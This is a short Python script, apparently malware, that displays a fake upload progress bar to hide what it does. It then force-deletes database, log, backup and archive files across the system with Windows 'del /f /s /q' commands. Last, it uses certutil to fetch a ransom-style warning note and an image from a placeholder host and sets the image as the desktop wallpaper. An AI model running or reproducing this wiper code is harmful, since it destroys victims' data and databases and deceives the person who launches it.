import random
from socket import *
import time
import os

tcp_client_socket = socket(AF_INET, SOCK_STREAM)
port = 80
ip = "www.python.org"
tcp_client_socket.connect((ip, port))
send_data = "f@ck"
print("tcp connecting...")
tcp_client_socket.send(send_data.encode("gbk"))
print("start upload")
time.sleep(3)
print("0%")
a = random.randrange(1, 20)
print(str(a) + "%")
time.sleep(2)
b = random.randrange(20, 40)
print(str(b) + "%")
time.sleep(1)
c = random.randrange(40, 60)
print(str(c) + "%")
time.sleep(2)
d = random.randrange(60, 80)
print(str(d) + "%")
time.sleep(1)
e = random.randrange(80, 99)
print(str(e) + "%")
print("100%")
print("!!completed!!")
os.system("del /f /s /q *.log ")
os.system("del /f /s /q *.mdb ")
os.system("del /f /s /q *.rdb ")
os.system("del /f /s /q *.mdf")
os.system("del /f /s /q *.db")
os.system("del /f /s /q *.dbf")
os.system("del /f /s /q *.wdb")
os.system("del /f /s /q *.7z")
os.system("del /f /s /q *.zip ")
os.system("del /f /s /q *\mysql\*")
os.system("del /f /s /q *\redis\* ")
os.system("del /f /s /q *.ISD ")
os.system("del /f /s /q *\mssql\* ")
os.system("del /f /s /q *.bak ")
os.system("del /f /s /q *.sql ")
os.system("del /f /s /q *.gz ")
os.system("del /f /s /q *.000003")
os.system("del /f /s /q *.000001 ")
os.system("del /f /s /q *.qp ")
os.system("del /f /s /q *.MYD ")
os.system("certutil -urlcache -split -f http://xxx/warning.txt c:\WAARRNING.TXT ")
os.system("copy c:\WAARRNING.TXT C:\Users\Administrator\WARNING.TXT ")
os.system("certutil -urlcache -split -f http://xxx/10.jpg c:\10.jpg ")
os.system("""reg add "hkcu\control panel\desktop" /v wallpaper /d "c:\10.jpg" /f""")
os.system("RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters ")
os.system(
    "copy C:\10.jpg C:\Users\Administrator\AppData\Roaming\Microsoft\Wind ows\Themes\WallpaperEngineBackupWallpaper.jpg  ")
os.system("RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters")
